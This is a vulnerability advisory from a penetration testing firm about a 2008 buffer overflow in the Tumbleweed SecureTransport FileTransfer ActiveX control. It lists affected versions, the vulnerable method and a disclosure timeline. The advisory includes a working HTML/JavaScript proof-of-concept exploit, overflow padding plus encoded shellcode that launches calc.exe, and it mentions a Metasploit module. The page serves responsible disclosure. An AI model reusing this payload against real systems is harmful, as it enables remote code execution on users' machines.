OSI Security - Penetration Testing & Web Application Security Consultants
  • Home
  • Try
  • Pricing
  • Services
    • Managed Monthly Penetration Testing Service
    • Managed Quarterly Penetration Testing Service
    • Email Security Review
    • Request a quote for Penetration Testing
    • Bug Bounty Penetration Test
    • Remote Support
  • Solutions
  • Company
    • Advisories
    • Customers
    • News and Press Releases
    • Blog
    • Contact
    • Careers
  • Home
  • Try
  • Pricing
  • Services
    • Managed Monthly Penetration Testing Service
    • Managed Quarterly Penetration Testing Service
    • Email Security Review
    • Request a quote for Penetration Testing
    • Bug Bounty Penetration Test
    • Remote Support
  • Solutions
  • Company
    • Advisories
    • Customers
    • News and Press Releases
    • Blog
    • Contact
    • Careers

Tumbleweed SecureTransport FileTransfer ActiveX TransferFile() Method remoteFile Variable Overflow

Release Date:
07-Apr-2008

Software:
Tumbleweed Communications - SecureTransport FileTransfer
http://www.tumbleweed.com/

Description:
"Tumbleweed SecureTransport is the industry's most secure Managed File Transfer
solution for moving financial transactions, critical business files, large
documents, XML, and EDI transactions over the Internet and private IP networks.
The SecureTransport managed file transfer suite was built with security in mind
from the ground up. SecureTransport provides corporate and government organizations
with an enterprise-class managed file transfer service supporting a broad and flexible
set of open Internet standards. Winner of the 2006 "Best Intellectual Property
Protection" award from SC Magazine, SecureTransport securely manages file transfer
at over 20,000 sites around the world.
Financial networks use SecureTransport to move billions of dollars in financial
transactions daily, and 8 of the top 10 U.S. banks use it to serve tens of thousands
of corporate customers. Healthcare providers, payers, producers and clearing houses
are linked through SecureTransport, which provides a single, integrated secure file
transfer infrastructure for transferring private health information (PHI). And
government agencies leverage SecureTransport to share sensitive documents
with other agencies."

Versions affected:
SecureTransport FileTransfer ActiveX Control vcst_eu.dll 1.0.0.5 English.
Prior versions, and other language editions (vcst_*.dll), are assumed to be vulnerable.

Vulnerability discovered:
Buffer Overflow.

Vulnerability impact:
High - Remote code execution.

Vulnerability information:
This vulnerability allows remote attackers to execute arbitrary code on vulnerable
installations of Tumbleweed Communications SecureTransport FileTransfer ActiveX Control.
User interaction is required to exploit this vulnerability in that the target must visit a
malicious page. It may be possible to embed into HTML capable email clients.
The specific flaw exists within the ActiveX control:

DLL: vcst_en.dll
CLSID: 38681fbd-d4cc-4a59-a527-b3136db711d3
interface IActiveXTransfer : IDispatch {
[id(0x00000007), helpstring("method TransferFile")]
HRESULT TransferFile(
[in] VARIANT URL,
[in] VARIANT hostName,
[in] VARIANT localFile,
[in] VARIANT remoteFile,
[in] VARIANT fdxCookie,
[in] long isSecure,
[in] long isUpload,
[in] int portNo,
[in] long isAscii,
[in] long shouldPerformMD5,
[in] long isCheckpointRestart,
[in] int serverPing,
[out, retval] VARIANT* errBuffer);
};

When a large value is specified for the 'remoteFile' parameter of the
IActiveXTransfer.FileTransfer() method, a stack overflow occurs. Exploitation can result
in code execution under the context of the current user. Other parameters, such as localFile,
fdxCookie and localFile may also vulnerable.

Examples:
The following HTML will execute calc.exe under Windows 2000 Professional.
<html>
<object classid="CLSID:38681fbd-d4cc-4a59-a527-b3136db711d3" id="Vulnerable"></object>
<script language="javascript">
Vulnerable.TransferFile("a", "b", "c", "HqwToZjIhHkOZrLAyrUXkIEJkcQkiYRtePnECVUqpnlzkJTgBuGiqyLUCnceJkrsIxPXchpkjFjIgJRqGvniwwHJssGiTaPpmKZlBPwGMYhShxUWMCLuhgrpWXfdoWCCRYtDTrwyvDmfdAtdazeizBqexoCGifFzEKzvLENkrNCoqpQVtclDmpzPIJZTgUuSHWyiZoUWeNzrJFILdoEpKoyEptrZidLYuGbCrHxrMURRpdXyYJLzbeGRKqUOliWDHFdTEJOsGLngqOVVZdjzlCgOYbvSaUKcmQcugvmVQWMQVfudlFmPvrmULKPQDVGuVFxuhFbuazTlsGbYhuJIjKfPdzGdYKcGVmVFqrtRrzXIGrauMEauSvNfDQkfyQNOTNSwftDyRhKdBFyZHaKQDDrxIEoFyrNLjLPTTGTYNlkoWfPdgSqStnopGaGkwCujLqtocvbYJuTVbUJUJbsloqLClPXTklqPEOsthiraZgJzElMuXPuleJCQdcLsEbnalOGUpZsLgafPsjJEjUuIKAwjZWAaMLnVZwqMQeUYToFMBuneclybwZcKUjHMZhUaEayTKAqPlXGIcUbJVXOpiergIyJVEegVBsPObCFGjXBCgEYZYWfUKxzvVzWeJvhqDRksWeZTWBRhMctQqFMuRHxuTifCqZUsVbILkcJNPUnbnsQHvxdmXMQdpHYTCiDBSwJUxmhKHRbYISvVGvburwysfdxiBPsDiHJJpBYnQpWdBQBwTrikbgybejtrQlBScWNsdHUxsaJpbKeamEbyjgABESztoNphFXKFclPKGFfrDhBdQkPSxApusHVXwumGCVrfgNUDmOaGOAtHkoPzfDLAvtNaXPHWLaKCCUQAYdaAxALDrEcLZwGCXkOcgLVsSrJHAWMtpeAnplUkYhTizmWNyribnFjJAtCxHSJsjAAiPbMTsmAVCioiIdvUVzEWpVJDfHQKGUAmmYqGUCfTXPyhkjcSyhBHOddRPvqWugerPbMMQlSllqNPquoytLBtvWbRyzAJddSxtzQaLATtYgibQzPeaMQzKIdpEJHPWSZyAkyaGkQJxCjgcrwQkBygMCsddYUdHifpbYdPgASxsPDjaTsArCJqosrCvrwHDKkUKjSaoJtbTaiJreoGjDWfDafPjrStaCeUQCVwiyvafEIcsbSvlCavYTHKSnyraoIuUcsWPSpCVHbWEYtwobKFQwvUjoCZqdZEFoQzvosazdPVjXhYqdnDpPTSRapMmAuFXsixOKucVKZZKOBSnAPEzsBcWMGBnNRUVffkJSzESkzkgyKWHkQXIIVjWCeCqMXZtGtGRafPCRyQkZYjRpQOHisWHfdtOSyZHJapOYBLQpRMDyNrhnmFeZWWaWpcuMkfEnZPBbLJwCQloArgGKvsudOoLNFfJwaWZzvSUGKFaddKnMIpuWwXtLzGKmkCJrDZkohkHrbmZZVhFGLhAgLMbwNVPixPcBefTvfNJimVtYGXYPgHChbZLSgPwSYzlqCIpzOMBVSjGzgksrmKjAjlDRIhBBmELmUDMFSqHwWpxfEEWwjzObyFXZVGOMrrWqsWADbtweGtddyFNAIpqQqRzxmVUbjAbUxnDndqpKNDbWKpIHGAQuoGcufpEkjrbMecXBzSsKentBwSHkNDbPBkiZEvnQEKtFgIKCKDDBMsnxFLBKgyTYEIkZdLjxBpuWUHRmrAqeLZGrSYcHlmhEsDbctsVoimbXEJryOLpibDVzoGaxfuhjyDvcNWhvSfixmuJUlNWoeEJVpSVupoCcTCLteLmglsHXIWOUXEWZURFNjdmnaxJPAAPaKtbTQkqyjqbgLsEZtZUQTbqXCzkpnCeKGbBvjiXJgnAbHGbowIAVKXRgcJXtkZLRuClxmJtSPfeIWyOUvaUGnXBQFJfbKwofltQJYldfKXbShFcfwumMWSgIOmiTzGofVNEuGOnkFnnzjKLJVXwAkxonTCeINNwkIDgoVZmjfnflgvWUToyMkVSuGAQhzDLSoeGtKuPHoPynBsdrVqPJcNksGiJmZWYsMZWoRIWsBTBwaSfOQlBjzmwqrGXdDBEeKSuwSncGcwJyOnlCpOkXWcrBdfTncQfwLYfQPPWmlrLMPUZiOMcoxUmOSJbVzqbKlmgIjQcPABepTGFchsrdWijXbYxfLkIMxoTDRjfkRiytIvzFAfWuXfHrEVXoAuVZEDPqiTemWciTsSmKbwEtfMXkIVpDxKlFxRJHdaMdUrEZCJNkATqMnWcbAAEWPDNeWaPtGArUDpDPNkemRFZiEFLVqxaMdZnWFvFtUrXYWnPjWNMdTuzsMFxnmMEtwVQEcaZHzIWvGfaNHKTgKroefyErvhZqAavhGLJFdIzbjnVXkJlfFEeWmfoTRFIYNtfIvIbjZNSsGMzjvZMYvfGwQDzmDdCLHDEMdkYdCluEwIXBGugcOmrVhhTqhcJeWofypbnAvXsHNKwqDrWWWKYePeXkpInurLBiCAtqtVqiYOIzPUzNZcmEUyOaIWetBzEUpovdlaSXRFtJSHkXsLKglMsqETAcHvJZWcGEeelObuqCdWaYqPhfghqGfnYpErsUIVSZQbiRpJNdoeHLXEFeqXBoMpnZTaJZchqHpkdocMEvdOEnhOzzueuOTwXrwEATaDaWJpXZuLsCrYczknwyAphmUevgvZzQGOQzyrsPvIZZUGXqSwgRADPhvcfBMAGYmPGDDXPnEoOzABADlDQGicETRIAmcRwsSvszWELcaseVabXOmGuBhpfOjhALMypkyCgyBDpFEwbnGYSXFiNqbOqUypiJiTrOthTyspQvMQawnagaFJWzgoxKWQpoHXFxRUWRcmtLHFLPakRPDxNiGliWQqtRBjKHnBAagKkuMQLLVuDLevjbkEhqGFFYylybFEyMvdnMaRdcucYrpaSNGesjkOYWczjffbJmhEWTgeYGPDKRHBuOmauGzNNKCXhOAOqhxdHQAdfQEffPDBrvGiEodtTDIXeDdsOXcmMrdMJdxnbZFiuVRFNioshyrXTVodBxaFXYBbwfVwcUSJXGdZZAnYMEhVtPEZYUUBeRJDZKFCrRuJQdLtkKakwFLEQXTcOUcjFPolJLWtJvXenczUxRbGZRINYXWUzzcHJNryYMOCHNZsrfloSffZWtgLJXudLeRYwbukvxEMcMwXAYiXChqgVXDeXDMvfowmLZSwkHjTLtIRFnmGFArnVllqfjiOnXPdZjaIxugozJjVcoVZnExzQxhxPrciIeSjJMBImjHfsHyoigqknpsAoNGpGqRSEVegZQXQlVQyNmewfOjiZCwTWOdSRCwnzQczqnWyeXTIzzukwVKkDAsStGbrCwYYFQqnlBheQVFhGfgwKSCcQSqixNGSPeVobgJLiNftjLqycVBbSUphUqoxxstwQUdAVkQfyoKUAKWgEJycUHyHRPoVbnTTVHvrGnwzlPAvDsThykmjHmaWLblFsSPlHrsBJTvHWAmJViArtMgJZaTbPARfcnHAlorGubyovlnCfyQArosOILFrXKHupmHusRIoQgDZzyZHsCZhNoOnHWnUsUGFeqYsLILkSwnvHsuOlYGjhIfMhwqmcaIMQaqFFkhABUEXzKyKYSQyOTyrFfqIlIkNvLxriALuQsbamSphbypAADfqgXjxtFKzlXCuuCovaozBjtrqjyRqEJTLoLWXSJUzayhZYomKFzYBfKYzGodrrIXemRZZRwDXyfCLVxmmdLOvwSCTjtsETodToQLvjrUkHUQktaQZvODJrtRgmEuFYDvPIcmynnHzAVroXUfFIvUszIyeJVaWogcLPDKuLTPmCWZEOWpyQeDUjhiyZHtjMEBnGYjYpnFeiAlaqfziytMiSAUmXpKzJEdIPWNdMKsjilgDITudqqCoHrsQDGUBIbxtHCJRzPIQuthMmhiaJSvncBzVNuDDIJFXvySSKUOlkFdEbbvvQYMRoFgGurkUAWbiczranFEsZzPYlUJKsAeFJOXPVmthxTdmgQWCzscNuhCNfRnOZFXwUOdGmHGhBijSrytzjNJiwDyNNlYmQbrjSSPvDgOdEGZNbKEkhyoboqmlzQUvEhrSrEAuKduQGvOyrVgCvrhmzXQjHsoQrkRMIgFNhqvMncLHcauYYPVcZNescGfqSPeFODxhzUkalkFRrMpnptBHYTZXVEgINvieNxFeJIVYRJaEsJOwDEkXaUxvuHQgUSjyVxoXfxjzNTXehTukeQAosgTtbaTswUhSSxGmytLAxAUYmLpcNOWqvHWgiJhfduWtwALnUZoiGZIlKhbnHZmGLWjfgMDLbNJKNJAJufWHQDDdBNZsXXiFzgADlSniUqBjVQBNmCEDuciGDgnpNqXRGfdrPfMeFBsUHvwPYNfguoTgJoAUVCsfsXKXqbUOVaTbvWzaLFIiBodrzFvgzkejRwlBvdoDjvRUegEepepXqzHopUAAzvHgnacEwmXoZkmYmxKNJFoxekgijRWXRJteBBqwpPSrUVlSiHHPqBvipxhCaLQlumwzvoFnQNHKzYnAFWcjqfsLzjjbIEBzRyMvTVSdQSoYhHzOUXgUERmDofuFOqzngpykPjhMpQElnoUzqwzHë !ÙÄ* uTXÝÄÙpô]UYIIIIIIIIIICCCCCC7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIKLJHQTEPC0C0LKG5GLLKCLDECHC1JOLKPOB8LKQOQ0EQJKQYLKGDLKEQJNP1IPMINLK4IPD4DGIQHJDMEQHBJKJTGKPTGTC4CEKULKQOQ4C1JKBFLKDLPKLKQOELEQJKLKELLKC1JKK9QLFDETHCQOP1L6E0F6E4LKQVFPLKG0DLLKBPELNMLKCXC8LIJXK3IPCZF0E8CNN8JBCCE8LXKNMZDNPWKOJGBCCQBLBCEPAA", "d", false, false, 80, false, true, true, 420)
</script>
</html>
Additionally, a Metasploit Framework Module has been written to demonstrate the vulnerability.

Credit:
Patrick Webster
​
Disclosure timeline:
13-Aug-2007 - Discovered during quick audit.
14-Aug-2007 - Metasploit module developed.
22-Aug-2007 - Notified vendor.
19-Oct-2007 - Vendor patch released. SecureTransport Server 4.6.1 Hotfix 20.
07-Apr-2008 - Disclosure.
NSW Government ICT Services (SCM0020) approved supplier
OSI Security is an approved supplier to the Victorian Government
OSI Security is an approved supplier to the Queensland Government
OSI Security is an approved supplier to the New Zealand Government
Picture
External Penetration Testing
Managed Security Services
​Source Code Review
Web Application Security Testing
Firewall Configuration and Rulesets
WiFi Access Point and Client Auditing
Forensics and Data Recovery
System Hardening and Configuration
Metasploit Pro
Tenable Nessus
Acunetix Web Scanner
Nexpose Vulnerability
Secunia Software Inspection
Elcomsoft Password Cracking
PortSwigger BurpSuite
HP Fortify
 
Contact
Clients
Advisories
Privacy policy
​
Ethics Statement
Disclosure Policy
OSI SECURITY ACN 144 579 751 © 2010 - 2023.
​ALL RIGHTS RESERVED. SYDNEY, AUSTRALIA.
Join newsletter

Picture

OSI Security is proud to support a number of recognised charities, development projects and industry groups...

The Australian Computer Museum Society Incorporated
Hackers Helping Hackers
sqlmap.org
Metasploit Framework
2600-AU Australia